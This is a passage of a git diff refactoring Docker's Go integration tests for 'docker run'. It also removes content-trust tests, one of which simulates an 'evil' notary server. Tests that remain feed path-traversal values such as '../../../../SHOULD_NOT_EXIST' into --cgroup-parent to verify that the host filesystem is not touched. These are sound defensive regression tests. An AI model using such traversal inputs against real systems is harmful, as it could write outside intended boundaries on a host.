out, _ := dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo test2267 >> /etc/hostname && cat /etc/hostname") - if !strings.Contains(out, "test2267") { - c.Fatal("/etc/hostname should contain 'test2267'") - } - - out, _ = dockerCmd(c, "diff", name) - if len(strings.Trim(out, "\r\n")) != 0 && !eqToBaseDiff(out, c) { - c.Fatal("diff should be empty") - } -} - -// Test for #2267 -func (s *DockerSuite) TestRunWriteResolvFileAndNotCommit(c *check.C) { - // Cannot run on Windows as Windows does not support diff. - testRequires(c, DaemonIsLinux) - name := "writeresolv" - out, _ := dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo test2267 >> /etc/resolv.conf && cat /etc/resolv.conf") - if !strings.Contains(out, "test2267") { - c.Fatal("/etc/resolv.conf should contain 'test2267'") - } - - out, _ = dockerCmd(c, "diff", name) - if len(strings.Trim(out, "\r\n")) != 0 && !eqToBaseDiff(out, c) { - c.Fatal("diff should be empty") - } -} - func (s *DockerSuite) TestRunWithBadDevice(c *check.C) { // Cannot run on Windows as Windows does not support --device testRequires(c, DaemonIsLinux) @@ -1973,7 +1880,7 @@ func (s *DockerSuite) TestRunEntrypoint(c *check.C) { func (s *DockerSuite) TestRunBindMounts(c *check.C) { testRequires(c, SameHostDaemon) - if daemonPlatform == "linux" { + if testEnv.OSType == "linux" { testRequires(c, DaemonIsLinux, NotUserNamespace) } @@ -1987,17 +1894,14 @@ func (s *DockerSuite) TestRunBindMounts(c *check.C) { defer os.RemoveAll(tmpDir) writeFile(path.Join(tmpDir, "touch-me"), "", c) - // TODO Windows: Temporary check - remove once TP5 support is dropped - if daemonPlatform != "windows" || windowsDaemonKV >= 14350 { - // Test reading from a read-only bind mount - out, _ := dockerCmd(c, "run", "-v", fmt.Sprintf("%s:%s/tmp:ro", tmpDir, prefix), "busybox", "ls", prefix+"/tmp") - if !strings.Contains(out, "touch-me") { - c.Fatal("Container failed to read from bind mount") - } + // Test reading from a read-only bind mount + out, _ := dockerCmd(c, "run", "-v", fmt.Sprintf("%s:%s/tmp:ro", tmpDir, prefix), "busybox", "ls", prefix+"/tmp") + if !strings.Contains(out, "touch-me") { + c.Fatal("Container failed to read from bind mount") } // test writing to bind mount - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { dockerCmd(c, "run", "-v", fmt.Sprintf(`%s:c:\tmp:rw`, tmpDir), "busybox", "touch", "c:/tmp/holla") } else { dockerCmd(c, "run", "-v", fmt.Sprintf("%s:/tmp:rw", tmpDir), "busybox", "touch", "/tmp/holla") @@ -2012,7 +1916,7 @@ func (s *DockerSuite) TestRunBindMounts(c *check.C) { } // Windows does not (and likely never will) support mounting a single file - if daemonPlatform != "windows" { + if testEnv.OSType != "windows" { // test mount a file dockerCmd(c, "run", "-v", fmt.Sprintf("%s/holla:/tmp/holla:rw", tmpDir), "busybox", "sh", "-c", "echo -n 'yotta' > /tmp/holla") content := readFile(path.Join(tmpDir, "holla"), c) // Will fail if the file doesn't exist @@ -2037,9 +1941,9 @@ func (s *DockerSuite) TestRunCidFileCleanupIfEmpty(c *check.C) { tmpCidFile := path.Join(tmpDir, "cid") image := "emptyfs" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { // Windows can't support an emptyfs image. Just use the regular Windows image - image = WindowsBaseImage + image = testEnv.PlatformDefaults.BaseImage } out, _, err := dockerCmdWithError("run", "--cidfile", tmpCidFile, image) if err == nil { @@ -2083,7 +1987,7 @@ func (s *DockerSuite) TestRunCidFileCheckIDLength(c *check.C) { func (s *DockerSuite) TestRunSetMacAddress(c *check.C) { mac := "12:34:56:78:9a:bc" var out string - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { out, _ = dockerCmd(c, "run", "-i", "--rm", fmt.Sprintf("--mac-address=%s", mac), "busybox", "sh", "-c", "ipconfig /all | grep 'Physical Address' | awk '{print $12}'") mac = strings.Replace(strings.ToUpper(mac), ":", "-", -1) // To Windows-style MACs } else { @@ -2122,21 +2026,16 @@ func (s *DockerSuite) TestRunDeallocatePortOnMissingIptablesRule(c *check.C) { // TODO Windows. Network settings are not propagated back to inspect. testRequires(c, SameHostDaemon, DaemonIsLinux) - out, _ := dockerCmd(c, "run", "-d", "-p", "23:23", "busybox", "top") + out := cli.DockerCmd(c, "run", "-d", "-p", "23:23", "busybox", "top").Combined() id := strings.TrimSpace(out) ip := inspectField(c, id, "NetworkSettings.Networks.bridge.IPAddress") - iptCmd := exec.Command("iptables", "-D", "DOCKER", "-d", fmt.Sprintf("%s/32", ip), - "!", "-i", "docker0", "-o", "docker0", "-p", "tcp", "-m", "tcp", "--dport", "23", "-j", "ACCEPT") - out, _, err := runCommandWithOutput(iptCmd) - if err != nil { - c.Fatal(err, out) - } - if err := deleteContainer(id); err != nil { - c.Fatal(err) - } + icmd.RunCommand("iptables", "-D", "DOCKER", "-d", fmt.Sprintf("%s/32", ip), + "!", "-i", "docker0", "-o", "docker0", "-p", "tcp", "-m", "tcp", "--dport", "23", "-j", "ACCEPT").Assert(c, icmd.Success) - dockerCmd(c, "run", "-d", "-p", "23:23", "busybox", "top") + cli.DockerCmd(c, "rm", "-fv", id) + + cli.DockerCmd(c, "run", "-d", "-p", "23:23", "busybox", "top") } func (s *DockerSuite) TestRunPortInUse(c *check.C) { @@ -2180,7 +2079,7 @@ func (s *DockerSuite) TestRunAllocatePortInReservedRange(c *check.C) { // Regression test for #7792 func (s *DockerSuite) TestRunMountOrdering(c *check.C) { - // TODO Windows: Post TP5. Updated, but Windows does not support nested mounts currently. + // TODO Windows: Post RS1. Windows does not support nested mounts. testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) prefix, _ := getPrefixAndSlashFromDaemonPlatform() @@ -2276,23 +2175,18 @@ func (s *DockerSuite) TestVolumesNoCopyData(c *check.C) { // are pre-populated such as is built in the dockerfile used in this test. testRequires(c, DaemonIsLinux) prefix, slash := getPrefixAndSlashFromDaemonPlatform() - if _, err := buildImage("dataimage", - `FROM busybox + buildImageSuccessfully(c, "dataimage", build.WithDockerfile(`FROM busybox RUN ["mkdir", "-p", "/foo"] - RUN ["touch", "/foo/bar"]`, - true); err != nil { - c.Fatal(err) - } - + RUN ["touch", "/foo/bar"]`)) dockerCmd(c, "run", "--name", "test", "-v", prefix+slash+"foo", "busybox") if out, _, err := dockerCmdWithError("run", "--volumes-from", "test", "dataimage", "ls", "-lh", "/foo/bar"); err == nil || !strings.Contains(out, "No such file or directory") { c.Fatalf("Data was copied on volumes-from but shouldn't be:\n%q", out) } - tmpDir := randomTmpDirPath("docker_test_bind_mount_copy_data", daemonPlatform) + tmpDir := RandomTmpDirPath("docker_test_bind_mount_copy_data", testEnv.OSType) if out, _, err := dockerCmdWithError("run", "-v", tmpDir+":/foo", "dataimage", "ls", "-lh", "/foo/bar"); err == nil || !strings.Contains(out, "No such file or directory") { - c.Fatalf("Data was copied on bind-mount but shouldn't be:\n%q", out) + c.Fatalf("Data was copied on bind mount but shouldn't be:\n%q", out) } } @@ -2312,13 +2206,8 @@ func (s *DockerSuite) TestRunNoOutputFromPullInStdout(c *check.C) { func (s *DockerSuite) TestRunVolumesCleanPaths(c *check.C) { testRequires(c, SameHostDaemon) prefix, slash := getPrefixAndSlashFromDaemonPlatform() - if _, err := buildImage("run_volumes_clean_paths", - `FROM busybox - VOLUME `+prefix+`/foo/`, - true); err != nil { - c.Fatal(err) - } - + buildImageSuccessfully(c, "run_volumes_clean_paths", build.WithDockerfile(`FROM busybox + VOLUME `+prefix+`/foo/`)) dockerCmd(c, "run", "-v", prefix+"/foo", "-v", prefix+"/bar/", "--name", "dark_helmet", "run_volumes_clean_paths") out, err := inspectMountSourceField("dark_helmet", prefix+slash+"foo"+slash) @@ -2328,7 +2217,7 @@ func (s *DockerSuite) TestRunVolumesCleanPaths(c *check.C) { out, err = inspectMountSourceField("dark_helmet", prefix+slash+`foo`) c.Assert(err, check.IsNil) - if !strings.Contains(strings.ToLower(out), strings.ToLower(volumesConfigPath)) { + if !strings.Contains(strings.ToLower(out), strings.ToLower(testEnv.PlatformDefaults.VolumesConfigPath)) { c.Fatalf("Volume was not defined for %s/foo\n%q", prefix, out) } @@ -2339,7 +2228,7 @@ func (s *DockerSuite) TestRunVolumesCleanPaths(c *check.C) { out, err = inspectMountSourceField("dark_helmet", prefix+slash+"bar") c.Assert(err, check.IsNil) - if !strings.Contains(strings.ToLower(out), strings.ToLower(volumesConfigPath)) { + if !strings.Contains(strings.ToLower(out), strings.ToLower(testEnv.PlatformDefaults.VolumesConfigPath)) { c.Fatalf("Volume was not defined for %s/bar\n%q", prefix, out) } } @@ -2349,7 +2238,9 @@ func (s *DockerSuite) TestRunSlowStdoutConsumer(c *check.C) { // TODO Windows: This should be able to run on Windows if can find an // alternate to /dev/zero and /dev/stdout. testRequires(c, DaemonIsLinux) - cont := exec.Command(dockerBinary, "run", "--rm", "busybox", "/bin/sh", "-c", "dd if=/dev/zero of=/dev/stdout bs=1024 count=2000 | catv") + + args := []string{"run", "--rm", "busybox", "/bin/sh", "-c", "dd if=/dev/zero of=/dev/stdout bs=1024 count=2000 | cat -v"} + cont := exec.Command(dockerBinary, args...) stdout, err := cont.StdoutPipe() if err != nil { @@ -2359,7 +2250,8 @@ func (s *DockerSuite) TestRunSlowStdoutConsumer(c *check.C) { if err := cont.Start(); err != nil { c.Fatal(err) } - n, err := consumeWithSpeed(stdout, 10000, 5*time.Millisecond, nil) + defer func() { go cont.Wait() }() + n, err := ConsumeWithSpeed(stdout, 10000, 5*time.Millisecond, nil) if err != nil { c.Fatal(err) } @@ -2421,48 +2313,6 @@ func (s *DockerSuite) TestRunModeIpcHost(c *check.C) { } } -func (s *DockerSuite) TestRunModeIpcContainer(c *check.C) { - // Not applicable on Windows as uses Unix-specific capabilities - testRequires(c, SameHostDaemon, DaemonIsLinux) - - out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", "echo -n test > /dev/shm/test && touch /dev/mqueue/toto && top") - - id := strings.TrimSpace(out) - state := inspectField(c, id, "State.Running") - if state != "true" { - c.Fatal("Container state is 'not running'") - } - pid1 := inspectField(c, id, "State.Pid") - - parentContainerIpc, err := os.Readlink(fmt.Sprintf("/proc/%s/ns/ipc", pid1)) - if err != nil { - c.Fatal(err) - } - - out, _ = dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "readlink", "/proc/self/ns/ipc") - out = strings.Trim(out, "\n") - if parentContainerIpc != out { - c.Fatalf("IPC different with --ipc=container:%s %s != %s\n", id, parentContainerIpc, out) - } - - catOutput, _ := dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "cat", "/dev/shm/test") - if catOutput != "test" { - c.Fatalf("Output of /dev/shm/test expected test but found: %s", catOutput) - } - - // check that /dev/mqueue is actually of mqueue type - grepOutput, _ := dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "grep", "/dev/mqueue", "/proc/mounts") - if !strings.HasPrefix(grepOutput, "mqueue /dev/mqueue mqueue rw") { - c.Fatalf("Output of 'grep /proc/mounts' expected 'mqueue /dev/mqueue mqueue rw' but found: %s", grepOutput) - } - - lsOutput, _ := dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "ls", "/dev/mqueue") - lsOutput = strings.Trim(lsOutput, "\n") - if lsOutput != "toto" { - c.Fatalf("Output of 'ls /dev/mqueue' expected 'toto' but found: %s", lsOutput) - } -} - func (s *DockerSuite) TestRunModeIpcContainerNotExists(c *check.C) { // Not applicable on Windows as uses Unix-specific capabilities testRequires(c, DaemonIsLinux) @@ -2709,10 +2559,10 @@ func (s *DockerSuite) TestRunNonLocalMacAddress(c *check.C) { args := []string{"run", "--mac-address", addr} expected := addr - if daemonPlatform != "windows" { + if testEnv.OSType != "windows" { args = append(args, "busybox", "ifconfig") } else { - args = append(args, WindowsBaseImage, "ipconfig", "/all") + args = append(args, testEnv.PlatformDefaults.BaseImage, "ipconfig", "/all") expected = strings.Replace(strings.ToUpper(addr), ":", "-", -1) } @@ -2805,7 +2655,7 @@ func (s *DockerSuite) TestRunSetDefaultRestartPolicy(c *check.C) { func (s *DockerSuite) TestRunRestartMaxRetries(c *check.C) { out, _ := dockerCmd(c, "run", "-d", "--restart=on-failure:3", "busybox", "false") timeout := 10 * time.Second - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { timeout = 120 * time.Second } @@ -2838,7 +2688,7 @@ func (s *DockerSuite) TestRunContainerWithReadonlyRootfs(c *check.C) { if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" { testPriv = false } - testReadOnlyFile(c, testPriv, "/file", "/etc/hosts", "/etc/resolv.conf", "/etc/hostname", "/sys/kernel", "/dev/.dont.touch.me") + testReadOnlyFile(c, testPriv, "/file", "/etc/hosts", "/etc/resolv.conf", "/etc/hostname") } func (s *DockerSuite) TestPermissionsPtsReadonlyRootfs(c *check.C) { @@ -2926,34 +2776,27 @@ func (s *DockerSuite) TestRunVolumesFromRestartAfterRemoved(c *check.C) { // run container with --rm should remove container if exit code != 0 func (s *DockerSuite) TestRunContainerWithRmFlagExitCodeNotEqualToZero(c *check.C) { + existingContainers := ExistingContainerIDs(c) name := "flowers" - out, _, err := dockerCmdWithError("run", "--name", name, "--rm", "busybox", "ls", "/notexists") - if err == nil { - c.Fatal("Expected docker run to fail", out, err) - } - - out, err = getAllContainers() - if err != nil { - c.Fatal(out, err) - } + cli.Docker(cli.Args("run", "--name", name, "--rm", "busybox", "ls", "/notexists")).Assert(c, icmd.Expected{ + ExitCode: 1, + }) + out := cli.DockerCmd(c, "ps", "-q", "-a").Combined() + out = RemoveOutputForExistingElements(out, existingContainers) if out != "" { c.Fatal("Expected not to have containers", out) } } func (s *DockerSuite) TestRunContainerWithRmFlagCannotStartContainer(c *check.C) { + existingContainers := ExistingContainerIDs(c) name := "sparkles" - out, _, err := dockerCmdWithError("run", "--name", name, "--rm", "busybox", "commandNotFound") - if err == nil { - c.Fatal("Expected docker run to fail", out, err) - } - - out, err = getAllContainers() - if err != nil { - c.Fatal(out, err) - } - + cli.Docker(cli.Args("run", "--name", name, "--rm", "busybox", "commandNotFound")).Assert(c, icmd.Expected{ + ExitCode: 127, + }) + out := cli.DockerCmd(c, "ps", "-q", "-a").Combined() + out = RemoveOutputForExistingElements(out, existingContainers) if out != "" { c.Fatal("Expected not to have containers", out) } @@ -3124,12 +2967,16 @@ func (s *DockerSuite) TestRunUnshareProc(c *check.C) { } }() + var retErr error for i := 0; i < 3; i++ { err := <-errChan - if err != nil { - c.Fatal(err) + if retErr == nil && err != nil { + retErr = err } } + if retErr != nil { + c.Fatal(retErr) + } } func (s *DockerSuite) TestRunPublishPort(c *check.C) { @@ -3173,13 +3020,10 @@ func (s *DockerSuite) TestVolumeFromMixedRWOptions(c *check.C) { dockerCmd(c, "run", "--name", "parent", "-v", prefix+"/test", "busybox", "true") - // TODO Windows: Temporary check - remove once TP5 support is dropped - if daemonPlatform != "windows" || windowsDaemonKV >= 14350 { - dockerCmd(c, "run", "--volumes-from", "parent:ro", "--name", "test-volumes-1", "busybox", "true") - } + dockerCmd(c, "run", "--volumes-from", "parent:ro", "--name", "test-volumes-1", "busybox", "true") dockerCmd(c, "run", "--volumes-from", "parent:rw", "--name", "test-volumes-2", "busybox", "true") - if daemonPlatform != "windows" { + if testEnv.OSType != "windows" { mRO, err := inspectMountPoint("test-volumes-1", prefix+slash+"test") c.Assert(err, checker.IsNil, check.Commentf("failed to inspect mount point")) if mRO.RW { @@ -3230,6 +3074,11 @@ func (s *DockerSuite) TestRunNetworkFilesBindMount(c *check.C) { filename := createTmpFile(c, expected) defer os.Remove(filename) + // for user namespaced test runs, the temp file must be accessible to unprivileged root + if err := os.Chmod(filename, 0646); err != nil { + c.Fatalf("error modifying permissions of %s: %v", filename, err) + } + nwfiles := []string{"/etc/resolv.conf", "/etc/hosts", "/etc/hostname"} for i := range nwfiles { @@ -3247,6 +3096,11 @@ func (s *DockerSuite) TestRunNetworkFilesBindMountRO(c *check.C) { filename := createTmpFile(c, "test123") defer os.Remove(filename) + // for user namespaced test runs, the temp file must be accessible to unprivileged root + if err := os.Chmod(filename, 0646); err != nil { + c.Fatalf("error modifying permissions of %s: %v", filename, err) + } + nwfiles := []string{"/etc/resolv.conf", "/etc/hosts", "/etc/hostname"} for i := range nwfiles { @@ -3264,6 +3118,11 @@ func (s *DockerSuite) TestRunNetworkFilesBindMountROFilesystem(c *check.C) { filename := createTmpFile(c, "test123") defer os.Remove(filename) + // for user namespaced test runs, the temp file must be accessible to unprivileged root + if err := os.Chmod(filename, 0646); err != nil { + c.Fatalf("error modifying permissions of %s: %v", filename, err) + } + nwfiles := []string{"/etc/resolv.conf", "/etc/hosts", "/etc/hostname"} for i := range nwfiles { @@ -3281,171 +3140,6 @@ func (s *DockerSuite) TestRunNetworkFilesBindMountROFilesystem(c *check.C) { } } -func (s *DockerTrustSuite) TestTrustedRun(c *check.C) { - // Windows does not support this functionality - testRequires(c, DaemonIsLinux) - repoName := s.setupTrustedImage(c, "trusted-run") - - // Try run - runCmd := exec.Command(dockerBinary, "run", repoName) - s.trustedCmd(runCmd) - out, _, err := runCommandWithOutput(runCmd) - if err != nil { - c.Fatalf("Error running trusted run: %s\n%s\n", err, out) - } - - if !strings.Contains(string(out), "Tagging") { - c.Fatalf("Missing expected output on trusted push:\n%s", out) - } - - dockerCmd(c, "rmi", repoName) - - // Try untrusted run to ensure we pushed the tag to the registry - runCmd = exec.Command(dockerBinary, "run", "--disable-content-trust=true", repoName) - s.trustedCmd(runCmd) - out, _, err = runCommandWithOutput(runCmd) - if err != nil { - c.Fatalf("Error running trusted run: %s\n%s", err, out) - } - - if !strings.Contains(string(out), "Status: Downloaded") { - c.Fatalf("Missing expected output on trusted run with --disable-content-trust:\n%s", out) - } -} - -func (s *DockerTrustSuite) TestUntrustedRun(c *check.C) { - // Windows does not support this functionality - testRequires(c, DaemonIsLinux) - repoName := fmt.Sprintf("%v/dockercliuntrusted/runtest:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - dockerCmd(c, "push", repoName) - dockerCmd(c, "rmi", repoName) - - // Try trusted run on untrusted tag - runCmd := exec.Command(dockerBinary, "run", repoName) - s.trustedCmd(runCmd) - out, _, err := runCommandWithOutput(runCmd) - if err == nil { - c.Fatalf("Error expected when running trusted run with:\n%s", out) - } - - if !strings.Contains(string(out), "does not have trust data for") { - c.Fatalf("Missing expected output on trusted run:\n%s", out) - } -} - -func (s *DockerTrustSuite) TestRunWhenCertExpired(c *check.C) { - // Windows does not support this functionality - testRequires(c, DaemonIsLinux) - c.Skip("Currently changes system time, causing instability") - repoName := s.setupTrustedImage(c, "trusted-run-expired") - - // Certificates have 10 years of expiration - elevenYearsFromNow := time.Now().Add(time.Hour * 24 * 365 * 11) - - runAtDifferentDate(elevenYearsFromNow, func() { - // Try run - runCmd := exec.Command(dockerBinary, "run", repoName) - s.trustedCmd(runCmd) - out, _, err := runCommandWithOutput(runCmd) - if err == nil { - c.Fatalf("Error running trusted run in the distant future: %s\n%s", err, out) - } - - if !strings.Contains(string(out), "could not validate the path to a trusted root") { - c.Fatalf("Missing expected output on trusted run in the distant future:\n%s", out) - } - }) - - runAtDifferentDate(elevenYearsFromNow, func() { - // Try run - runCmd := exec.Command(dockerBinary, "run", "--disable-content-trust", repoName) - s.trustedCmd(runCmd) - out, _, err := runCommandWithOutput(runCmd) - if err != nil { - c.Fatalf("Error running untrusted run in the distant future: %s\n%s", err, out) - } - - if !strings.Contains(string(out), "Status: Downloaded") { - c.Fatalf("Missing expected output on untrusted run in the distant future:\n%s", out) - } - }) -} - -func (s *DockerTrustSuite) TestTrustedRunFromBadTrustServer(c *check.C) { - // Windows does not support this functionality - testRequires(c, DaemonIsLinux) - repoName := fmt.Sprintf("%v/dockerclievilrun/trusted:latest", privateRegistryURL) - evilLocalConfigDir, err := ioutil.TempDir("", "evilrun-local-config-dir") - if err != nil { - c.Fatalf("Failed to create local temp dir") - } - - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - if err != nil { - c.Fatalf("Error running trusted push: %s\n%s", err, out) - } - if !strings.Contains(string(out), "Signing and pushing trust metadata") { - c.Fatalf("Missing expected output on trusted push:\n%s", out) - } - - dockerCmd(c, "rmi", repoName) - - // Try run - runCmd := exec.Command(dockerBinary, "run", repoName) - s.trustedCmd(runCmd) - out, _, err = runCommandWithOutput(runCmd) - if err != nil { - c.Fatalf("Error running trusted run: %s\n%s", err, out) - } - - if !strings.Contains(string(out), "Tagging") { - c.Fatalf("Missing expected output on trusted push:\n%s", out) - } - - dockerCmd(c, "rmi", repoName) - - // Kill the notary server, start a new "evil" one. - s.not.Close() - s.not, err = newTestNotary(c) - if err != nil { - c.Fatalf("Restarting notary server failed.") - } - - // In order to make an evil server, lets re-init a client (with a different trust dir) and push new data. - // tag an image and upload it to the private registry - dockerCmd(c, "--config", evilLocalConfigDir, "tag", "busybox", repoName) - - // Push up to the new server - pushCmd = exec.Command(dockerBinary, "--config", evilLocalConfigDir, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err = runCommandWithOutput(pushCmd) - if err != nil { - c.Fatalf("Error running trusted push: %s\n%s", err, out) - } - if !strings.Contains(string(out), "Signing and pushing trust metadata") { - c.Fatalf("Missing expected output on trusted push:\n%s", out) - } - - // Now, try running with the original client from this new trust server. This should fail because the new root is invalid. - runCmd = exec.Command(dockerBinary, "run", repoName) - s.trustedCmd(runCmd) - out, _, err = runCommandWithOutput(runCmd) - - if err == nil { - c.Fatalf("Continuing with cached data even though it's an invalid root rotation: %s\n%s", err, out) - } - if !strings.Contains(out, "could not rotate trust to a new trusted root") { - c.Fatalf("Missing expected output on trusted run:\n%s", out) - } -} - func (s *DockerSuite) TestPtraceContainerProcsFromHost(c *check.C) { // Not applicable on Windows as uses Unix specific functionality testRequires(c, DaemonIsLinux, SameHostDaemon) @@ -3543,48 +3237,23 @@ func (s *DockerSuite) TestRunContainerWithCgroupParent(c *check.C) { // Not applicable on Windows as uses Unix specific functionality testRequires(c, DaemonIsLinux) - cgroupParent := "test" - name := "cgroup-test" + // cgroup-parent relative path + testRunContainerWithCgroupParent(c, "test", "cgroup-test") - out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup") - if err != nil { - c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err) - } - cgroupPaths := parseCgroupPaths(string(out)) - if len(cgroupPaths) == 0 { - c.Fatalf("unexpected output - %q", string(out)) - } - id, err := getIDByName(name) - c.Assert(err, check.IsNil) - expectedCgroup := path.Join(cgroupParent, id) - found := false - for _, path := range cgroupPaths { - if strings.HasSuffix(path, expectedCgroup) { - found = true - break - } - } - if !found { - c.Fatalf("unexpected cgroup paths. Expected at least one cgroup path to have suffix %q. Cgroup Paths: %v", expectedCgroup, cgroupPaths) - } + // cgroup-parent absolute path + testRunContainerWithCgroupParent(c, "/cgroup-parent/test", "cgroup-test-absolute") } -func (s *DockerSuite) TestRunContainerWithCgroupParentAbsPath(c *check.C) { - // Not applicable on Windows as uses Unix specific functionality - testRequires(c, DaemonIsLinux) - - cgroupParent := "/cgroup-parent/test" - name := "cgroup-test" +func testRunContainerWithCgroupParent(c *check.C, cgroupParent, name string) { out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup") if err != nil { c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err) } - cgroupPaths := parseCgroupPaths(string(out)) + cgroupPaths := ParseCgroupPaths(string(out)) if len(cgroupPaths) == 0 { c.Fatalf("unexpected output - %q", string(out)) } - id, err := getIDByName(name) - c.Assert(err, check.IsNil) + id := getIDByName(c, name) expectedCgroup := path.Join(cgroupParent, id) found := false for _, path := range cgroupPaths { @@ -3603,49 +3272,12 @@ func (s *DockerSuite) TestRunInvalidCgroupParent(c *check.C) { // Not applicable on Windows as uses Unix specific functionality testRequires(c, DaemonIsLinux) - cgroupParent := "../../../../../../../../SHOULD_NOT_EXIST" - cleanCgroupParent := "SHOULD_NOT_EXIST" - name := "cgroup-invalid-test" + testRunInvalidCgroupParent(c, "../../../../../../../../SHOULD_NOT_EXIST", "SHOULD_NOT_EXIST", "cgroup-invalid-test") - out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup") - if err != nil { - // XXX: This may include a daemon crash. - c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err) - } - - // We expect "/SHOULD_NOT_EXIST" to not exist. If not, we have a security issue. - if _, err := os.Stat("/SHOULD_NOT_EXIST"); err == nil || !os.IsNotExist(err) { - c.Fatalf("SECURITY: --cgroup-parent with ../../ relative paths cause files to be created in the host (this is bad) !!") - } - - cgroupPaths := parseCgroupPaths(string(out)) - if len(cgroupPaths) == 0 { - c.Fatalf("unexpected output - %q", string(out)) - } - id, err := getIDByName(name) - c.Assert(err, check.IsNil) - expectedCgroup := path.Join(cleanCgroupParent, id) - found := false - for _, path := range cgroupPaths { - if strings.HasSuffix(path, expectedCgroup) { - found = true - break - } - } - if !found { - c.Fatalf("unexpected cgroup paths. Expected at least one cgroup path to have suffix %q. Cgroup Paths: %v", expectedCgroup, cgroupPaths) - } + testRunInvalidCgroupParent(c, "/../../../../../../../../SHOULD_NOT_EXIST", "/SHOULD_NOT_EXIST", "cgroup-absolute-invalid-test") } -// TestRunInvalidCgroupParent checks that a specially-crafted cgroup parent doesn't cause Docker to crash or start modifying /. -func (s *DockerSuite) TestRunAbsoluteInvalidCgroupParent(c *check.C) { - // Not applicable on Windows as uses Unix specific functionality - testRequires(c, DaemonIsLinux) - - cgroupParent := "/../../../../../../../../SHOULD_NOT_EXIST" - cleanCgroupParent := "/SHOULD_NOT_EXIST" - name := "cgroup-absolute-invalid-test" - +func testRunInvalidCgroupParent(c *check.C, cgroupParent, cleanCgroupParent, name string) { out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup") if err != nil { // XXX: This may include a daemon crash. @@ -3654,15 +3286,14 @@ func (s *DockerSuite) TestRunAbsoluteInvalidCgroupParent(c *check.C) { // We expect "/SHOULD_NOT_EXIST" to not exist. If not, we have a security issue. if _, err := os.Stat("/SHOULD_NOT_EXIST"); err == nil || !os.IsNotExist(err) { - c.Fatalf("SECURITY: --cgroup-parent with /../../ garbage paths cause files to be created in the host (this is bad) !!") + c.Fatalf("SECURITY: --cgroup-parent with ../../ relative paths cause files to be created in the host (this is bad) !!") } - cgroupPaths := parseCgroupPaths(string(out)) + cgroupPaths := ParseCgroupPaths(string(out)) if len(cgroupPaths) == 0 { c.Fatalf("unexpected output - %q", string(out)) } - id, err := getIDByName(name) - c.Assert(err, check.IsNil) + id := getIDByName(c, name) expectedCgroup := path.Join(cleanCgroupParent, id) found := false for _, path := range cgroupPaths { @@ -3783,8 +3414,8 @@ func (s *DockerSuite) TestRunLoopbackOnlyExistsWhenNetworkingDisabled(c *check.C // Issue #4681 func (s *DockerSuite) TestRunLoopbackWhenNetworkDisabled(c *check.C) { - if daemonPlatform == "windows" { - dockerCmd(c, "run", "--net=none", WindowsBaseImage, "ping", "-n", "1", "127.0.0.1") + if testEnv.OSType == "windows" { + dockerCmd(c, "run", "--net=none", testEnv.PlatformDefaults.BaseImage, "ping", "-n", "1", "127.0.0.1") } else { dockerCmd(c, "run", "--net=none", "busybox", "ping", "-c", "1", "127.0.0.1") } @@ -4030,23 +3661,19 @@ func (s *DockerSuite) TestRunWrongCpusetMemsFlagValue(c *check.C) { // TestRunNonExecutableCmd checks that 'docker run busybox foo' exits with error code 127' func (s *DockerSuite) TestRunNonExecutableCmd(c *check.C) { name := "testNonExecutableCmd" - runCmd := exec.Command(dockerBinary, "run", "--name", name, "busybox", "foo") - _, exit, _ := runCommandWithOutput(runCmd) - stateExitCode := findContainerExitCode(c, name) - if !(exit == 127 && strings.Contains(stateExitCode, "127")) { - c.Fatalf("Run non-executable command should have errored with exit code 127, but we got exit: %d, State.ExitCode: %s", exit, stateExitCode) - } + icmd.RunCommand(dockerBinary, "run", "--name", name, "busybox", "foo").Assert(c, icmd.Expected{ + ExitCode: 127, + Error: "exit status 127", + }) } // TestRunNonExistingCmd checks that 'docker run busybox /bin/foo' exits with code 127. func (s *DockerSuite) TestRunNonExistingCmd(c *check.C) { name := "testNonExistingCmd" - runCmd := exec.Command(dockerBinary, "run", "--name", name, "busybox", "/bin/foo") - _, exit, _ := runCommandWithOutput(runCmd) - stateExitCode := findContainerExitCode(c, name) - if !(exit == 127 && strings.Contains(stateExitCode, "127")) { - c.Fatalf("Run non-existing command should have errored with exit code 127, but we got exit: %d, State.ExitCode: %s", exit, stateExitCode) - } + icmd.RunCommand(dockerBinary, "run", "--name", name, "busybox", "/bin/foo").Assert(c, icmd.Expected{ + ExitCode: 127, + Error: "exit status 127", + }) } // TestCmdCannotBeInvoked checks that 'docker run busybox /etc' exits with 126, or @@ -4054,34 +3681,32 @@ func (s *DockerSuite) TestRunNonExistingCmd(c *check.C) { // as that's when the check is made (and yes, by its design...) func (s *DockerSuite) TestCmdCannotBeInvoked(c *check.C) { expected := 126 - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected = 127 } name := "testCmdCannotBeInvoked" - runCmd := exec.Command(dockerBinary, "run", "--name", name, "busybox", "/etc") - _, exit, _ := 